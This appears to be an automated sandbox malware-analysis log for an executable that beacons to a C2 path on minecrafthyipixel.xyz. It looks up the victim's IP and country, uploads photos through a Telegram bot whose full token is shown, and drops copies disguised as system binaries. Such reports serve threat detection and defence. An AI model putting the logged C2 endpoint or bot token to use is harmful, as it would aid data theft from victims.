Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2192Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2164Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2192Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: unknown HTTP traffic detected: POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2"Host: api.telegram.orgContent-Length: 100984Expect: 100-continueConnection: Keep-Alive
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000384B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000017.00000002.3244330908.000002B847530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhotoX
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000033.00000003.2049334674.000001F0A8E1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.3244405482.0000023E3B510000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 0000001A.00000002.3163703892.0000014AE8FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5Consumers
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000378A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/country
Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9B890DA8 0_2_00007FFD9B890DA8
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BA0018F 0_2_00007FFD9BA0018F
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC61B7F 0_2_00007FFD9BC61B7F
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B899FAF 19_2_00007FFD9B899FAF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8991DF 19_2_00007FFD9B8991DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B880DA8 19_2_00007FFD9B880DA8
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C312D 19_2_00007FFD9B8C312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8CB58D 19_2_00007FFD9B8CB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8CF886 19_2_00007FFD9B8CF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B899FAF 20_2_00007FFD9B899FAF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8991DF 20_2_00007FFD9B8991DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C312D 20_2_00007FFD9B8C312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8CB58D 20_2_00007FFD9B8CB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8CF886 20_2_00007FFD9B8CF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B880DA8 20_2_00007FFD9B880DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8A0DA8 21_2_00007FFD9B8A0DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8B9FAF 21_2_00007FFD9B8B9FAF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8B91DF 21_2_00007FFD9B8B91DF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E312D 21_2_00007FFD9B8E312D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8EB58D 21_2_00007FFD9B8EB58D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8EF886 21_2_00007FFD9B8EF886
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B880DA8 22_2_00007FFD9B880DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C312D 22_2_00007FFD9B8C312D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8CB58D 22_2_00007FFD9B8CB58D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8CF886 22_2_00007FFD9B8CF886
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B899FAF 22_2_00007FFD9B899FAF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8991DF 22_2_00007FFD9B8991DF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_00007FFD9B9630E9 28_2_00007FFD9B9630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FFD9B9730E9 30_2_00007FFD9B9730E9
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8D312D 38_2_00007FFD9B8D312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8DB58D 38_2_00007FFD9B8DB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8DF886 38_2_00007FFD9B8DF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8A9FAF 38_2_00007FFD9B8A9FAF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8A91DF 38_2_00007FFD9B8A91DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B890DA8 38_2_00007FFD9B890DA8
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 40_2_00007FFD9B8A0DA8 40_2_00007FFD9B8A0DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8A0DA8 41_2_00007FFD9B8A0DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8B9FAF 41_2_00007FFD9B8B9FAF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8B91DF 41_2_00007FFD9B8B91DF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8E312D 41_2_00007FFD9B8E312D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8EB58D 41_2_00007FFD9B8EB58D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8EF886 41_2_00007FFD9B8EF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B880DA8 44_2_00007FFD9B880DA8
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B899EDD 44_2_00007FFD9B899EDD
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8991DF 44_2_00007FFD9B8991DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8C312D 44_2_00007FFD9B8C312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8CF886 44_2_00007FFD9B8CF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8CB58D 44_2_00007FFD9B8CB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B9F018F 44_2_00007FFD9B9F018F
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\BazpdGXT.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
Source: W4tW72sfAD.exe, 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs W4tW72sfAD.exe
Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs W4tW72sfAD.exe
Source: W4tW72sfAD.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
